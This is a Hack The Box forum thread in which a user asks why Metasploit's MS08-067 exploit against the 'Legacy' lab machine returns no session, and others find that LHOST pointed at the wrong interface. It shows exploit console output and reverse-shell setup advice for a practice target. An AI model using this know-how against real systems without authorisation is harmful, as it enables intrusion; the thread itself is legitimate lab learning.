Legacy exploit prob

HTB Content Machines
1

so I run the nmap and get the whole bunch of info from there and after that I find the correct exploit MS08-067. TO be sure I set up RHOSTS , target and payload.

I get stuck at :

msf5 exploit(windows/smb/ms08_067_netapi) > exploit

[] Started reverse TCP handler on 10.0.2.15:4444
[] 10.10.10.4:445 - Automatically detecting the target…
[] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[] 10.10.10.4:445 - Attempting to trigger the vulnerability…
[] Exploit completed, but no session was created.

any idea why the session is not created as it should ?

2

If that’s for hack the box, maybe you need to set LHOST tun0 (or your VPN ip address). I think you can also use 0.0.0.0 to listen in all interfaces.

3

btw I tried all 144 payoads manually and non worked

4

@ompamo said:

If that’s for hack the box, maybe you need to set LHOST tun0 (or your VPN ip address). I think you can also use 0.0.0.0 to listen in all interfaces.

Is your HTB IP address really 10.0.2.15 ?

5

I see 999 ports are filtered. Not responding to the ping.

6

@nescodey said:

I see 999 ports are filtered. Not responding to the ping.

Are you connected to a VIP VPN and have you started the box in your environment?

7

I run openvp as vip account , and did a successfull ping to the legacy ip

8

also yeah I know it is strange but really my ip is 10.0.2.15

9

@Relastra said:

also yeah I know it is strange but really my ip is 10.0.2.15

Are you 100% sure this is the IP address given to you by the HTB system? If you go to here Login :: Hack The Box :: Penetration Testing Labs is it showing up on the “HTB Lab Access Details” box?

10

■■■ u are correct, It is showing 10.10.14.25. So I should change LHOST to 10.10.14.25 right ?

11

it worked !! mark it as solved and thank you so so so much

12

@Relastra said:

■■■ u are correct, It is showing 10.10.14.25. So I should change LHOST to 10.10.14.25 right ?

Nice one.

When you are checking your IP, you might have looked at the wrong interface (its normally something like Tun0 but it can vary if you have other VPNs or anything running).

13

I found the best way to configure your metasploit LHOST to tun0 instead of using IP addresses.
That way you are guaranteed to always get the tun0 address (a lot of automation scripts works like that too) (i.e sniper)

14

thanks guys … this helped me …

15

.